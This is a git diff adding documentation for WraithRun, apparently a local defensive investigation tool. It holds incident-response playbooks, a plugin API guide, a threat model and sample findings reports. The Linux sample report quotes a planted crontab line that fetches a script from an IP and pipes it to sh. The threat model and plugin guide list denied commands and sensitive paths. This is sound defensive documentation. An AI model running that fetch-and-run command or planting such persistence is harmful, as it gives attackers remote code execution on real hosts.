+- WraithRun tools focus on **detection** and **investigation** — they do not perform exploitation or active response.
+- The agent's finding derivation engine uses tool observations to generate findings that reference these techniques contextually.
+- For best coverage, combine multiple tools in a single investigation task. The agent will select the appropriate tools based on the task description.
diff --git a/docs/playbook-credential-leak.md b/docs/playbook-credential-leak.md
new file mode 100644
index 0000000..ca66b33
--- /dev/null
+++ b/docs/playbook-credential-leak.md
@@ -0,0 +1,61 @@
+# Playbook: Audit Privileged Account Changes After a Credential Leak
+
+## Goal
+
+After learning of a credential leak (e.g., password dump, phishing compromise, or insider threat), determine what account-level changes have been made and whether the compromised credentials were used.
+
+## Prerequisites
+
+- WraithRun installed on the target host.
+- Access to local user databases and authentication logs.
+- Known timeframe of the credential leak or suspected compromise window.
+
+## Steps
+
+### 1. Audit account changes
+
+Check all local account modifications, creations, deletions, group membership changes, and password resets.
+
+```bash
+wraithrun run "audit all account changes looking for new accounts, group membership modifications, and password resets"
+```
+
+### 2. Review authentication logs
+
+Search for login attempts — especially successful logins from unusual times, sources, or patterns.
+
+```bash
+wraithrun run "read syslog entries for authentication events, failed logins, and sudo usage during the past 72 hours"
+```
+
+### 3. Check for persistence
+
+Attackers who obtain valid credentials often install persistence to survive password rotations.
+
+```bash
+wraithrun run "inspect persistence locations for anything added in the past week"
+```
+
+### 4. Correlate network and process activity
+
+Look for sessions or processes running under the compromised account that show unusual behavior.
+
+```bash
+wraithrun run "correlate processes and network connections for processes running as the compromised user account"
+```
+
+## Expected Output Walkthrough
+
+- **High — New account `svc-monitor` added to Administrators group**: Account created 12 hours after the credential leak timeline.
+- **Medium — Successful SSH login from external IP for user `deploy`**: Login occurred outside normal business hours.
+- **Medium — Cron job added under user `deploy`**: Runs a curl command to an external URL every 6 hours.
+- **Info — No privilege escalation vectors detected**: System configuration is not vulnerable to common escalation paths.
+
+## Next Steps
+
+- Force password rotation for all potentially compromised accounts.
+- Remove unauthorized accounts and group memberships.
+- Revoke and rotate all API keys, tokens, and SSH keys for affected accounts.
+- Disable persistence entries planted by the attacker.
+- Notify affected users and initiate incident response procedures.
+- Document findings in a case: `POST /api/v1/cases`.
diff --git a/docs/playbook-persistence-sweep.md b/docs/playbook-persistence-sweep.md
new file mode 100644
index 0000000..5015c85
--- /dev/null
+++ b/docs/playbook-persistence-sweep.md
@@ -0,0 +1,70 @@
+# Playbook: Check for Persistence Mechanisms Post-Breach
+
+## Goal
+
+After confirming a breach, perform a comprehensive sweep of all known persistence mechanisms to identify attacker footholds that would survive reboots, password resets, or partial remediation.
+
+## Prerequisites
+
+- WraithRun installed on the target host (Linux or Windows).
+- Administrator or root read access.
+- An established timeline of the breach for filtering recent changes.
+
+## Steps
+
+### 1. Full persistence inspection
+
+Run a comprehensive check of all registered persistence locations.
+
+```bash
+wraithrun run "inspect all persistence locations for entries added or modified in the past 30 days"
+```
+
+### 2. Capture a coverage baseline
+
+Get a full system snapshot to identify anything that the persistence check alone might miss.
+
+```bash
+wraithrun run "capture a full coverage baseline including all running processes, services, scheduled tasks, and startup items"
+```
+
+### 3. Hash suspicious binaries
+
+For any suspicious files discovered in persistence locations, compute their SHA-256 hashes for threat intelligence lookup.
+
+```bash
+wraithrun run "hash the binaries referenced by suspicious persistence entries"
+```
+
+### 4. Review logs for persistence activity
+
+Check system logs for evidence of persistence being installed — task scheduler events, service creation, registry modifications.
+
+```bash
+wraithrun run "read syslog and event log entries related to scheduled task creation, service installation, and registry changes"
+```
+
+### 5. Network correlation for active backdoors
+
+Check if any persistence mechanism is currently phoning home.
+
+```bash
+wraithrun run "correlate process-network activity for processes spawned by scheduled tasks or startup items"
+```
+
+## Expected Output Walkthrough
+
+- **Critical — Malicious systemd service `update-helper.service`**: Service file created post-breach, runs an obfuscated binary on boot.
+- **High — Scheduled task with encoded PowerShell command**: Task `SystemHealthCheck` runs every 2 hours, downloads and executes remote payload.
+- **High — Unknown binary `/usr/local/bin/sysmond` with active C2 connection**: SHA-256 hash not found in known-good baselines.
+- **Medium — Modified `.bashrc` for user `www-data`**: Appended command that runs on every shell login.
+- **Low — Cron job for log rotation looks legitimate**: Entry matches expected system maintenance pattern.
+
+## Next Steps
+
+- Prioritize removal of Critical and High persistence entries.
+- Compare binary hashes against threat intelligence (VirusTotal, MISP).
+- Re-image the host if persistence is deeply embedded (rootkit, firmware level).
+- Monitor for re-infection after remediation.
+- Generate a narrative report for stakeholders: `wraithrun run --format narrative`.
+- Track all findings in a case for audit trail: `POST /api/v1/cases`.
diff --git a/docs/playbook-ssh-keys.md b/docs/playbook-ssh-keys.md
new file mode 100644
index 0000000..0990a3f
--- /dev/null
+++ b/docs/playbook-ssh-keys.md
@@ -0,0 +1,61 @@
+# Playbook: Investigate Suspicious SSH Keys on a Linux Host
+
+## Goal
+
+Determine whether unauthorized SSH keys have been planted on a Linux host, identify which accounts are affected, and assess whether the keys are actively being used for access.
+
+## Prerequisites
+
+- WraithRun installed and available on the target host (or a forensic copy of the filesystem mounted locally).
+- The host runs Linux with OpenSSH configured.
+- You have read access to `/home/`, `/root/`, and `/var/log/`.
+
+## Steps
+
+### 1. Run a persistence check
+
+Inspect known persistence locations including SSH `authorized_keys` files, cron jobs, and systemd units that may reference planted keys.
+
+```bash
+wraithrun run "inspect persistence locations for planted SSH keys or suspicious authorized_keys entries"
+```
+
+### 2. Audit account changes
+
+Look for recently created or modified accounts that an attacker might have added to host their SSH key.
+
+```bash
+wraithrun run "audit account changes for recently created or modified users"
+```
+
+### 3. Correlate network activity
+
+Check if any active SSH sessions or connections originate from unexpected source IPs.
+
+```bash
+wraithrun run "correlate processes and network connections looking for unexpected SSH sessions"
+```
+
+### 4. Review syslog
+
+Search authentication logs for key-based logins, failed attempts, or `sshd` configuration reloads.
+
+```bash
+wraithrun run "read syslog entries related to SSH authentication and key-based logins"
+```
+
+## Expected Output Walkthrough
+
+A completed run with the above tasks should produce findings such as:
+
+- **High — Unauthorized SSH key in `/home/deploy/.ssh/authorized_keys`**: A key not matching any known team member was added after the last authorized change window.
+- **Medium — New user account `svc-backup` created recently**: Account created 2 days ago with no corresponding change request.
+- **Low — SSH connections from internal subnet only**: No external SSH connections detected at this time.
+
+## Next Steps
+
+- Remove unauthorized keys from `authorized_keys` files.
+- Disable or lock suspicious user accounts.
+- Rotate all SSH host keys if compromise is confirmed.
+- Review SSH configuration (`/etc/ssh/sshd_config`) for weakened settings (e.g., `PermitRootLogin yes`).
+- Create an investigation case to track follow-up: `wraithrun serve` + `POST /api/v1/cases`.
diff --git a/docs/playbook-windows-triage.md b/docs/playbook-windows-triage.md
new file mode 100644
index 0000000..eabfe99
--- /dev/null
+++ b/docs/playbook-windows-triage.md
@@ -0,0 +1,69 @@
+# Playbook: Triage a Potentially Compromised Windows Workstation
+
+## Goal
+
+Perform initial triage of a Windows workstation suspected of compromise. Identify active threats, persistence mechanisms, and lateral movement indicators.
+
+## Prerequisites
+
+- WraithRun installed on the target workstation or a forensic copy accessible locally.
+- The host runs Windows 10/11 or Windows Server 2016+.
+- You have administrator-level read access.
+
+## Steps
+
+### 1. Capture a coverage baseline
+
+Start with a comprehensive snapshot of the system's current state including running processes, network connections, services, and scheduled tasks.
+
+```bash
+wraithrun run "capture a full coverage baseline of this Windows workstation"
+```
+
+### 2. Inspect persistence mechanisms
+
+Check Run keys, scheduled tasks, services, startup folders, and WMI subscriptions for unauthorized entries.
+
+```bash
+wraithrun run "inspect all persistence locations for suspicious autostart entries or recently modified scheduled tasks"
+```
+
+### 3. Correlate processes with network activity
+
+Identify processes making outbound connections to unusual destinations, high-entropy domain names, or known C2 ports.
+
+```bash
+wraithrun run "correlate running processes with their network connections and flag any suspicious outbound activity"
+```
+
+### 4. Check for privilege escalation vectors
+
+Determine if the attacker has escalated privileges or left paths open for future escalation.
+
+```bash
+wraithrun run "check for privilege escalation vectors including unquoted service paths and writable service binaries"
+```
+
+### 5. Audit account changes
+
+Look for new local accounts, group membership changes, or password resets that occurred during the suspected compromise window.
+
+```bash
+wraithrun run "audit local account changes for new accounts or group membership modifications"
+```
+
+## Expected Output Walkthrough
+
+- **Critical — Suspicious scheduled task `WindowsUpdateHelper`**: Task created 3 days ago, runs a PowerShell-encoded command every 4 hours. Points to T1053.005.
+- **High — Process `svchost_helper.exe` connecting to external IP on port 443**: Unknown binary with network activity to a non-Microsoft IP.
+- **Medium — Unquoted service path for `BackupAgent` service**: Could be exploited for privilege escalation via path interception.
+- **Low — Local account `admin2` created recently**: No corresponding IT change ticket found.
+
+## Next Steps
+
+- Isolate the workstation from the network if active C2 is confirmed.
+- Collect volatile evidence (memory dump) before remediation.
+- Remove malicious persistence entries.
+- Hash suspicious binaries with `hash_binary` and check against threat intelligence feeds.
+- Create a formal investigation case: `POST /api/v1/cases` with findings linked.
+- Generate a narrative report: `wraithrun run --format narrative`.
diff --git a/docs/plugin-api.md b/docs/plugin-api.md
new file mode 100644
index 0000000..058fdef
--- /dev/null
+++ b/docs/plugin-api.md
@@ -0,0 +1,140 @@
+# Plugin Tool API
+
+WraithRun supports loading external tools from a plugin directory. Each plugin
+is a self-contained directory with a `tool.toml` manifest and an executable
+command. Plugins communicate with the agent via JSON on stdin/stdout.
+
+## Quick start
+
+```bash
+# 1. Create a plugin directory
+mkdir -p ~/.config/wraithrun/tools/my_tool
+
+# 2. Write a tool.toml manifest
+cat > ~/.config/wraithrun/tools/my_tool/tool.toml <<'EOF'
+name = "my_tool"
+description = "Short description of what the tool does."
+version = "0.1.0"
+command = "my_tool.sh"
+platforms = ["linux", "macos"]
+
+[parameters.target]
+type = "string"
+required = true
+description = "Host or path to operate on."
+EOF
+
+# 3. Write the executable
+cat > ~/.config/wraithrun/tools/my_tool/my_tool.sh <<'SCRIPT'
+#!/usr/bin/env bash
+set -euo pipefail
+input=$(cat)
+echo '{"status":"ok","message":"tool ran successfully"}'
+SCRIPT
+chmod +x ~/.config/wraithrun/tools/my_tool/my_tool.sh
+
+# 4. Run WraithRun with the plugin enabled
+wraithrun --allowed-plugins my_tool "Investigate host 10.0.0.1"
+```
+
+## `tool.toml` reference
+
+| Field          | Type       | Required | Description                                          |
+|----------------|------------|----------|------------------------------------------------------|
+| `name`         | string     | yes      | Unique tool name (must match directory name by convention). |
+| `description`  | string     | yes      | One-line description shown to the LLM agent.         |
+| `version`      | string     | no       | Semver version of the plugin.                        |
+| `command`      | string     | yes      | Path to the executable, relative to the plugin dir.  |
+| `platforms`    | string[]   | no       | Supported platforms (`linux`, `macos`, `windows`). Empty = all. |
+| `timeout_secs` | integer    | no       | Max seconds the process may run. Default: 30.        |
+
+### Parameters
+
+Parameters are defined as TOML tables under `[parameters.<name>]`:
+
+```toml
+[parameters.target]
+type = "string"
+required = true
+description = "The host to scan."
+
+[parameters.port_range]
+type = "string"
+required = false
+description = "Port range, e.g. 1-1024."
+```
+
+These are exposed to the LLM agent as the tool's JSON Schema arguments.
+
+## JSON stdin/stdout contract
+
+When the agent calls the plugin, WraithRun:
+
+1. Spawns the plugin `command` with the plugin directory as the working directory.
+2. Writes a JSON object to stdin containing the parameter values chosen by the agent.
+3. Closes stdin.
+4. Waits for the process to exit (subject to `timeout_secs`).
+5. Reads stdout as a single JSON object (max 1 MiB).
+
+### Input (stdin)
+
+```json
+{
+  "target": "10.0.0.1",
+  "port_range": "22-443"
+}
+```
+
+### Output (stdout)
+
+Any valid JSON object. The agent sees the full object as the tool result.
+
+```json
+{
+  "open_ports": [22, 80, 443],
+  "scan_time_ms": 1250
+}
+```
+
+### Errors
+
+If the process exits with a non-zero status, WraithRun captures up to 500
+characters of stderr and reports a tool execution error to the agent.
+
+## Security model
+
+Plugins are subject to the same **sandbox policy** as built-in tools:
+
+- The plugin command name is checked against the global command denylist
+  (e.g. `rm`, `mkfs`, `dd`, `shutdown`). Denied commands are never executed.
+- Plugins must be **explicitly allow-listed** via `--allowed-plugins`. Plugins
+  not in the list are silently skipped during discovery.
+- The plugin process runs with the same user permissions as WraithRun itself.
+  It does **not** run in a container or seccomp sandbox.
+- In dry-run mode (default), the agent proposes tool calls but does not
+  execute them. Plugins only run when `--live` is active.
+
+### Recommendations
+
+- Review plugin code before adding it to the allow-list.
+- Use the `platforms` field to prevent accidental execution on unsupported OSes.
+- Set conservative `timeout_secs` values to prevent runaway processes.
+- Place plugin directories on a read-only filesystem when possible.
+
+## CLI flags
+
+| Flag                | Description                                              |
+|---------------------|----------------------------------------------------------|
+| `--tools-dir PATH`  | Override the plugin directory (default: `~/.config/wraithrun/tools/`). |
+| `--allowed-plugins` | Comma-separated list of plugin names to load.            |
+
+## Diagnostics
+
+- `--doctor` reports discovered plugin tools under the `plugin-tools` check.
+- The `/api/v1/runtime/status` endpoint includes a `plugin_tools` array when
+  plugins are loaded via `--serve`.
+
+## Example plugin
+
+See [`examples/tools/hello_world/`](../examples/tools/hello_world/) for a
+minimal working plugin that echoes its input with a greeting.
diff --git a/docs/sample-report-linux-persistence.md b/docs/sample-report-linux-persistence.md
new file mode 100644
index 0000000..d990969
--- /dev/null
+++ b/docs/sample-report-linux-persistence.md
@@ -0,0 +1,66 @@
+# Sample Report: Linux Server Persistence Investigation
+
+This is an anonymized sample report generated by WraithRun showing what output looks like for a persistence-focused investigation on a Linux host.
+
+## Run Metadata
+
+- **Task**: "Investigate potential unauthorized persistence mechanisms on the production web server"
+- **Mode**: dry-run
+- **Model tier**: Basic (deterministic)
+- **Duration**: 2.3s
+- **Tools executed**: 4 of 8
+
+## Final Answer
+
+Investigation complete. Found 5 findings across 4 severity levels. The host shows signs of unauthorized persistence including a suspicious systemd service and a recently modified crontab entry. Recommend immediate review of the identified entries and comparison with approved change records.
+
+## Findings
+
+### 1. High — Unrecognized systemd service `metrics-collector.service`
+
+- **Confidence**: Likely (75%)
+- **Evidence**: `inspect_persistence_locations` (turn 1) found a service unit file at `/etc/systemd/system/metrics-collector.service` that was created 5 days ago. The service runs `/opt/.cache/mc-agent` which is not in the approved software inventory.
+- **Recommended action**: Disable the service immediately (`systemctl disable metrics-collector`), quarantine the binary, compute its SHA-256 hash, and check against threat intelligence feeds. Review the service file for any network-related configuration.
+
+### 2. High — Modified crontab for user `www-data`
+
+- **Confidence**: Likely (75%)
+- **Evidence**: `inspect_persistence_locations` (turn 1) detected a crontab entry for `www-data` that runs `curl -s http://10.0.5.88:8443/check | sh` every 6 hours. The entry was added after the last approved deployment.
+- **Recommended action**: Remove the crontab entry. Investigate the target IP `10.0.5.88` — determine if it is an internal host or attacker infrastructure. Check web server logs for the same IP.
+
+### 3. Medium — SSH authorized_key for root with no comment
+
+- **Confidence**: Possible (50%)
+- **Evidence**: `inspect_persistence_locations` (turn 1) found an SSH public key in `/root/.ssh/authorized_keys` with no identifying comment. The key fingerprint does not match any team member keys on record.
+- **Recommended action**: Remove the unrecognized key. Rotate all root-level SSH keys. Review `sshd` configuration to ensure `PermitRootLogin` is set to `prohibit-password` or `no`.
+
+### 4. Low — No suspicious network listeners detected
+
+- **Confidence**: Informational (25%)
+- **Evidence**: `scan_network` (turn 2) found 12 listening sockets, all matching expected services (sshd:22, nginx:80, nginx:443, postgres:5432, node:3000, and system services).
+- **Recommended action**: No immediate action. Continue monitoring for new listeners.
+
+### 5. Info — Process-network correlation nominal
+
+- **Confidence**: Informational (25%)
+- **Evidence**: `correlate_process_network` (turn 3) mapped all 47 active connections to known processes. No orphaned connections or unexpected outbound destinations.
+- **Recommended action**: No action needed. Archive baseline for future comparison.
+
+## Investigation Steps
+
+| Step | Tool | Duration |
+|------|------|----------|
+| 1 | `inspect_persistence_locations` | 450ms |
+| 2 | `scan_network` | 120ms |
+| 3 | `correlate_process_network` | 380ms |
+| 4 | `audit_account_changes` | 290ms |
+
+## Severity Distribution
+
+| Severity | Count |
+|----------|-------|
+| Critical | 0 |
+| High | 2 |
+| Medium | 1 |
+| Low | 1 |
+| Info | 1 |
diff --git a/docs/sample-report-windows-triage.md b/docs/sample-report-windows-triage.md
new file mode 100644
index 0000000..987363f
--- /dev/null
+++ b/docs/sample-report-windows-triage.md
@@ -0,0 +1,80 @@
+# Sample Report: Windows Workstation Post-Compromise Triage
+
+This is an anonymized sample report generated by WraithRun showing what output looks like for a Windows host triage investigation.
+
+## Run Metadata
+
+- **Task**: "Triage potentially compromised Windows workstation — check for persistence, lateral movement indicators, and active C2"
+- **Mode**: dry-run
+- **Model tier**: Basic (deterministic)
+- **Duration**: 3.1s
+- **Tools executed**: 5 of 8
+
+## Final Answer
+
+Investigation complete. Found 7 findings across 5 severity levels. The workstation shows clear indicators of compromise: a malicious scheduled task with encoded PowerShell, an unknown process with active C2-like connection, and a recently created local admin account. Immediate containment is recommended.
+
+## Findings
+
+### 1. Critical — Scheduled task `WindowsUpdateHelper` with encoded PowerShell
+
+- **Confidence**: Confirmed (95%)
+- **Evidence**: `inspect_persistence_locations` (turn 1) found a scheduled task created 3 days ago that runs `powershell.exe -enc [base64]` every 4 hours under SYSTEM context. The decoded payload downloads and executes a remote script.
+- **Recommended action**: Disable and delete the task immediately. Decode the full payload for IOC extraction. This is a high-confidence indicator of T1053.005 (Scheduled Task) and T1059.001 (PowerShell execution).
+
+### 2. High — Unknown process `svchost_helper.exe` with outbound connection
+
+- **Confidence**: Likely (75%)
+- **Evidence**: `correlate_process_network` (turn 2) found process `svchost_helper.exe` (PID 4892) maintaining a persistent TCP connection to `185.x.x.x:443`. The binary is located in `C:\Users\Public\Downloads\` — not a standard system path.
+- **Recommended action**: Terminate the process. Quarantine the binary and compute its hash. Block the destination IP at the network perimeter. Submit the binary to threat intel for classification.
+
+### 3. High — Local account `support_admin` in Administrators group
+
+- **Confidence**: Likely (75%)
+- **Evidence**: `audit_account_changes` (turn 3) detected a local account `support_admin` created 2 days ago and added to the local Administrators group. No corresponding IT service ticket exists.
+- **Recommended action**: Disable the account immediately. Check for any sessions or processes running under this account. Review Event Log for the account creation source (Event ID 4720).
+
+### 4. Medium — Unquoted service path for `BackupAgent` service
+
+- **Confidence**: Possible (50%)
+- **Evidence**: `check_privilege_escalation_vectors` (turn 4) found the `BackupAgent` service with binary path `C:\Program Files\Backup Agent\agent.exe` registered without quotes. This creates a path interception vulnerability.
+- **Recommended action**: Fix the service path by enclosing it in quotes in the registry. Check if `C:\Program.exe` or `C:\Program Files\Backup.exe` exist — their presence would confirm exploitation.
+
+### 5. Medium — Multiple failed RDP login attempts
+
+- **Confidence**: Possible (50%)
+- **Evidence**: `read_syslog` (turn 5) found 47 failed RDP login attempts for user `Administrator` from internal IP `10.0.2.15` over the past 24 hours. Pattern suggests automated brute-force.
+- **Recommended action**: Block the source IP. Investigate the source host `10.0.2.15` for compromise (may indicate lateral movement). Enable account lockout policies if not already configured.
+
+### 6. Low — Standard Windows services running normally
+
+- **Confidence**: Informational (25%)
+- **Evidence**: `capture_coverage_baseline` (turn 1) found 142 running processes and 89 active services. Cross-referencing with known-good baseline shows expected Windows system processes.
+- **Recommended action**: No action. Use as reference baseline for future comparisons.
+
+### 7. Info — Network baseline captured
+
+- **Confidence**: Informational (25%)
+- **Evidence**: `scan_network` (turn 2) found 23 listening sockets. Standard services detected: RDP (3389), SMB (445), WinRM (5985), IIS (80, 443). One unexpected listener on port 8443 associated with `svchost_helper.exe`.
+- **Recommended action**: Port 8443 is linked to finding #2. No additional network anomalies detected beyond the confirmed C2 connection.
+
+## Investigation Steps
+
+| Step | Tool | Duration |
+|------|------|----------|
+| 1 | `capture_coverage_baseline` | 580ms |
+| 2 | `inspect_persistence_locations` | 490ms |
+| 3 | `correlate_process_network` | 410ms |
+| 4 | `audit_account_changes` | 320ms |
+| 5 | `check_privilege_escalation_vectors` | 280ms |
+| 6 | `read_syslog` | 350ms |
+
+## Severity Distribution
+
+| Severity | Count |
+|----------|-------|
+| Critical | 1 |
+| High | 2 |
+| Medium | 2 |
+| Low | 1 |
+| Info | 1 |
diff --git a/docs/threat-model.md b/docs/threat-model.md
new file mode 100644
index 0000000..9063461
--- /dev/null
+++ b/docs/threat-model.md
@@ -0,0 +1,97 @@
+# WraithRun Threat Model
+
+This document describes WraithRun's own attack surface, trust boundaries, and security controls. It is intended for security professionals evaluating WraithRun before deploying it in their environment.
+
+## System Overview
+
+WraithRun is a local-first cyber investigation runtime. It runs entirely on the local host, with no cloud dependencies. In API server mode, it binds to `127.0.0.1` by default.
+
+### Components
+
+| Component | Role | Trust Level |
+|-----------|------|-------------|
+| CLI (`wraithrun`) | User interface, config parsing, report rendering | Trusted — user-controlled |
+| Core Engine | Agent loop, finding derivation, report generation | Trusted — internal logic |
+| Inference Bridge | ONNX Runtime model loading and inference | Partially trusted — processes model files |
+| Cyber Tools | 8 built-in investigation tools | Trusted — sandboxed execution |
+| API Server | Local REST API and dashboard | Trusted — localhost-only by default |
+| SQLite Database | Persistent storage for runs and cases | Trusted — local file |
+| Audit Log | JSON-lines event trail | Trusted — append-only local file |
+
+## Trust Boundaries
+
+### Boundary 1: User Input → CLI
+
+- **Threat**: Malicious task descriptions, config file injection, path traversal in arguments.
+- **Controls**: Task strings are treated as opaque text, never interpolated into shell commands. File paths are validated against the sandbox policy before use. Config files are parsed with TOML (no code execution).
+
+### Boundary 2: CLI → Tool Execution
+
+- **Threat**: A crafted task could cause the agent to invoke tools with dangerous arguments.
+- **Controls**: The `SandboxPolicy` enforces:
+  - **Path allowlist/denylist**: Tools can only read from explicitly allowed directory trees. Sensitive paths (`/etc/shadow`, `/proc`, `C:\Windows\System32\config`) are denied by default.
+  - **Command allowlist/denylist**: Only specific system commands are allowed (`ss`, `id`, `netstat`, `whoami`, etc.). Shells (`bash`, `powershell`, `cmd`) are denied.
+  - **No write operations**: Tools only read and inspect — they never modify the target system.
+
+### Boundary 3: API Server → Network
+
+- **Threat**: Unauthorized access to the API, cross-origin attacks, denial of service.
+- **Controls**:
+  - **Localhost binding**: The server binds to `127.0.0.1` by default. External access requires explicit `--bind` override.
+  - **Bearer token authentication**: All mutating and data-reading endpoints require a valid bearer token. The token is auto-generated (UUID v4) on startup and displayed in the terminal. Users can override with `--api-token`.
+  - **Request body size limit**: Default 1 MiB limit prevents oversized payloads.
+  - **No CORS headers**: The dashboard is served from the same origin. No cross-origin API access is permitted.
+
+### Boundary 4: Model Files → Inference Engine
+
+- **Threat**: Malicious ONNX model files could exploit vulnerabilities in the ONNX Runtime.
+- **Controls**:
+  - Models are loaded from a user-specified local path — WraithRun does not download models from the internet.
+  - In dry-run mode (default), no model is loaded or executed at all.
+  - The ONNX Runtime is a well-maintained dependency with ongoing security updates.
+  - Users should verify model file integrity (SHA-256) before use.
+
+### Boundary 5: Dashboard → Browser
+
+- **Threat**: Cross-site scripting (XSS) via finding titles, task descriptions, or other user-supplied text.
+- **Controls**:
+  - All dynamic text rendered in the dashboard HTML is escaped via a DOM-based `textContent` escaping function (`esc()`). No `innerHTML` is used with raw user input.
+  - The API token is stored in `localStorage` and transmitted via `Authorization` header — not in URL parameters or cookies.
+  - No external scripts, stylesheets, or CDNs are referenced. The dashboard is a self-contained HTML file.
+
+## Attack Surface Summary
+
+| Surface | Risk Level | Mitigation |
+|---------|-----------|------------|
+| CLI argument parsing | Low | Validated by clap; no shell interpolation |
+| Task description text | Low | Treated as opaque; escaped in HTML output |
+| Tool subprocess execution | Medium | Sandbox policy (path + command allowlists) |
+| Local API server | Medium | Localhost-only + bearer token auth |
+| Model file loading | Medium | User-controlled path; dry-run by default |
+| SQLite database | Low | Local file; no SQL injection (parameterized queries) |
+| Audit log file | Low | Append-only; structured JSON |
+| Dashboard HTML | Low | Self-contained; all output escaped |
+
+## Data Flow
+
+```
+User → CLI → Core Engine → Tool Registry → Sandbox Policy → System Commands
+                ↓                                              ↓
+         Inference Bridge                               Tool Observations
+          (optional)                                         ↓
+                ↓                                    Finding Derivation
+           LLM Output                                       ↓
+                ↓                                      Run Report
+         Agent Decisions                                    ↓
+                                                   API / Dashboard / File
+```
+
+## Recommendations for Deployers
+
+1. **Run in dry-run mode** for initial evaluation. No model loading, no inference, deterministic output.
+2. **Review sandbox policy** before first use. Adjust `WRAITHRUN_ALLOWED_READ_ROOTS` and `WRAITHRUN_COMMAND_ALLOWLIST` environment variables for your environment.
+3. **Protect the API token**. Treat it like a password. Do not embed it in scripts stored in version control.
+4. **Keep the server on localhost**. If you must expose the API to the network, add a reverse proxy with TLS and additional authentication.
+5. **Verify model files**. If using live inference mode, only load models from trusted sources. Check SHA-256 hashes before deployment.
+6. **Enable audit logging**. Use `--audit-log <path>` to maintain a tamper-evident record of all API operations.
+7. **Use database persistence**. Use `--database <path>` to ensure investigation history survives server restarts.
diff --git a/docs/upgrades.md b/docs/upgrades.md
index 19504cc..3a5c7c5 100644
--- a/docs/upgrades.md
+++ b/docs/upgrades.md
@@ -1,5 +1,41 @@
 # Upgrade Notes
 
+## v1.2.0
+
+### Breaking/visible changes
+
+- Two new CLI flags: `--tools-dir <PATH>` and `--allowed-plugins <name1,name2,...>`. These are optional and have no effect unless explicitly used.
+- The `/api/v1/runtime/status` response now includes a `plugin_tools` array (empty when no plugins are loaded). Clients that strictly validate the response schema may need updating.
+- The web dashboard has been completely redesigned with a 5-tab layout. Bookmarks or scripts that scraped the old single-page layout may need adjustment.
+- Workspace tokio dependency now includes the `io-util` feature. This is transparent to users but may slightly increase binary size.
+
+### New documentation
+
+- **Investigation playbooks**: 4 step-by-step guides for common security tasks (SSH keys, Windows triage, credential leak, persistence sweep).
+- **Plugin API**: full reference for writing external tool plugins (`docs/plugin-api.md`).
+- **MITRE ATT&CK mapping**: all 8 built-in tools mapped to ATT&CK techniques.
+- **Threat model**: attack surface analysis and security control documentation.
+- **Sample reports**: 2 anonymized investigation reports demonstrating output format.
+
+### Migration examples
+
+To load an external plugin tool:
+
+```bash
+# Create a plugin directory with a tool.toml manifest
+mkdir -p ~/.config/wraithrun/tools/my_scanner
+# ... add tool.toml and executable (see docs/plugin-api.md)
+
+# Run with the plugin enabled
+wraithrun --allowed-plugins my_scanner --task "Scan host 10.0.0.1"
+```
+
+To verify plugin discovery:
+
+```bash
+wraithrun --allowed-plugins my_scanner --doctor
+```
+
 ## v1.1.0
 
 ### Breaking/visible changes
diff --git a/examples/tools/hello_world/hello_world.sh b/examples/tools/hello_world/hello_world.sh
new file mode 100644
index 0000000..eb1d41a
--- /dev/null
+++ b/examples/tools/hello_world/hello_world.sh
@@ -0,0 +1,9 @@
+#!/usr/bin/env bash
+# Example WraithRun plugin tool.
+# Reads JSON from stdin, extracts "target", and returns a JSON greeting.
+set -euo pipefail
+
+input=$(cat)
+target=$(printf '%s' "$input" | python3 -c "import sys,json; print(json.load(sys.stdin).get('target','world'))" 2>/dev/null || echo "world")
+
+printf '{"greeting":"Hello, %s!","echo":%s}\n' "$target" "$input"
diff --git a/examples/tools/hello_world/tool.toml b/examples/tools/hello_world/tool.toml
new file mode 100644
index 0000000..2975728
--- /dev/null
+++ b/examples/tools/hello_world/tool.toml
@@ -0,0 +1,10 @@
+name = "hello_world"
+description = "Example plugin tool that echoes its input with a greeting."
+version = "0.1.0"
+command = "hello_world.sh"
+platforms = ["linux", "macos"]
+
+[parameters.target]
+type = "string"
+required = true
+description = "Name or host to greet."
diff --git a/mkdocs.yml b/mkdocs.yml
index 3956db3..cf6e454 100644
--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -38,6 +38,7 @@ nav:
   - Automation Workflows: automation-workflows.md
   - Live-Mode Operations: live-mode-operations.md
   - Tool Reference: tool-reference.md
+  - Plugin API: plugin-api.md
   - Security and Sandbox: security-sandbox.md
   - Troubleshooting: troubleshooting.md
   - Release and Operations: